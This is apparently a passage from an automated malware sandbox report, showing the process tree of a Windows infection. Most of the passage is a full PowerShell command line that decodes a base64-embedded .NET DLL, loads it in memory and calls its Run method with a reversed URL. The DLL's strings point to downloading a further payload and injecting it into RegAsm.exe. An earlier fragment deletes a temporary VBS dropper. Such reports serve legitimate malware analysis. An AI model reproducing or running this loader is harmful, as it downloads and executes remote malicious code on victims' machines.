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');powershell.exe -Command $VXdfe; Remove-Item -Path C:\Users\Admin\AppData\Local\Temp\x.vbs
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '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c3RhbmNlAGRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2UAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAR2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUATWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEhlbHBLZXl3b3JkQXR0cmlidXRlAEdlbmVyYXRlZENvZGVBdHRyaWJ1dGUARGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAU3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGUASGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAERlYnVnZ2VySGlkZGVuQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBNZXRob2RJbmZvAEN1bHR1cmVJbmZvAG1fQXBwT2JqZWN0UHJvdmlkZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAG1fTXlXZWJTZXJ2aWNlc09iamVjdFByb3ZpZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAe3QAeAB0AC4AMwAwAGUAcABtAHUAUgAvADMAMAAtAGUAcABtAHUAcgAvAHMAbQBlAHQAaQAvADIAMQAvAGcAcgBvAC4AZQB2AGkAaABjAHIAYQAuAHMAdQAuADMAMAA0ADEAMAA2AGEAaQAvAC8AOgBzAHAAdAB0AGgAAQUDJgMmAQNBAABFQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawAAF1wAdgA0AC4AMAAuADMAMAAzADEAOQAAKUMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBDAGwAYQBzAHMAMQAAB1IAdQBuAAAXXABSAGUAZwBBAHMAbQAuAGUAeABlAAAAe000wQGMFUmZ7QBV0BJNAQAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFBByAEAQ4ODg4GFRIoARIMBhUSKAESCAYVEigBEmEGFRIoARIkBCAAEwAFAAICHBwHAAESaRGAjQUgABKAkQcgAgEOEoCRCAABEoCVEoCVCAcEDg4OEoCJBgABARGAnQUAABKApQYgAQESgKUEAAEODgQgAQ4OBSACDg4OBQACDg4OBQAAEoCxBQABHQUOByABEoCRHQUFIAESaQ4GIAESgLkOBiACHBwdHAYAAQESgIkDAAABBAABHBwEIAECHAMgAAgDIAAOBAcBHgACHgAFEAEAHgAECgEeAAQHARMABhUSKAETAAcGFRJtARMABhUSbQETAAITAAQKARMABSABARMACLd6XFYZNOCJCLA/X38R1Qo6BwYVEigBEgwHBhUSKAESCAcGFRIoARJhBwYVEigBEiQDBhJ9BAYSgIEDBhIYBAAAEgwEAAASCAQAABJhBAAAEiQEAAASfQUAABKAgQYAAQESgIEEAAASGAQAAQEOBCAAEmkHEAEBHgAeAAcwAQEBEB4ABAgAEgwECAASCAQIABJhBAgAEiQECAASfQUIABKAgQQIABIYBCgAEwAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAABQEAAAAAKQEAJDc5MTcyQjEzLUVEQkEtNDA5Ni1CNzI1LThFOTJCNzMwQjJCQQAADAEABzEuMC4wLjAAAEkBABouTkVURnJhbWV3b3JrLFZlcnNpb249djQuNQEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUSLk5FVCBGcmFtZXdvcmsgNC41BAEAAAAIAQABAAAAAAAYAQAKTXlUZW1wbGF0ZQgxMS4wLjAuMAAAQQEAM1N5c3RlbS5SZXNvdXJjZXMuVG9vbHMuU3Ryb25nbHlUeXBlZFJlc291cmNlQnVpbGRlcggxNi4wLjAuMAAAWQEAS01pY3Jvc29mdC5WaXN1YWxTdHVkaW8uRWRpdG9ycy5TZXR0aW5nc0Rlc2lnbmVyLlNldHRpbmdzU2luZ2xlRmlsZUdlbmVyYXRvcggxNi4yLjAuMAAAYQEANFN5c3RlbS5XZWIuU2VydmljZXMuUHJvdG9jb2xzLlNvYXBIdHRwQ2xpZW50UHJvdG9jb2wSQ3JlYXRlX19JbnN0YW5jZV9fE0Rpc3Bvc2VfX0luc3RhbmNlX18AAAAQAQALTXkuQ29tcHV0ZXIAABMBAA5NeS5BcHBsaWNhdGlvbgAADAEAB015LlVzZXIAABMBAA5NeS5XZWJTZXJ2aWNlcwAAEAEAC015LlNldHRpbmdzAAAAAAC0AAAAzsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAAAAAAAAAAAAFBBRFBBRFC0AAAAAAAAAEjHs6YAAAAAAgAAAHkAAAA0OgAANBwAAAAAAAAAAAAA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';[Byte[]] $HWqMQ = [System.Convert]::FromBase64String( $pICwv );[System.AppDomain]::CurrentDomain.Load($HWqMQ).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('WG8b/war/edoc/oi.slootw//:sptth'))"
4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
